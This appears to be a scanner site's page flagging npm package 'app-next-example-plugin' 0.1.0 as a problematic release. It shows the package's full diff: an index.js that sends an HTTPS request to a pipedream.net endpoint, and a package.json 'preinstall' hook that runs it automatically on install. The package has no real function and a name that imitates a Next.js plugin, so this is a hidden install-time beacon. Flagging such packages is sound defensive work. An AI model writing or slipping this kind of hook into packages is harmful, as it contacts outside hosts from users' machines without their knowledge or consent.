app-next-example-plugin 0.1.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of app-next-example-plugin might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +16 -0
  2. package/package.json +12 -0
package/index.js ADDED
@@ -0,0 +1,16 @@
1
+ const https = require("https");
2
+
3
+ const options = {
4
+ hostname: "eojg1icuaea87a0.m.pipedream.net",
5
+ port: 443,
6
+ path: "/app-next-example-plugin",
7
+ method: "GET",
8
+ };
9
+
10
+ const req = https.request(options, (res) => {
11
+ res.on("data", (d) => {
12
+ process.stdout.write(d);
13
+ });
14
+ });
15
+
16
+ req.end();
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "app-next-example-plugin",
3
+ "version": "0.1.0",
4
+ "description": "NPM Upload",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "SuryaBhai",
11
+ "license": "ISC"
12
+ }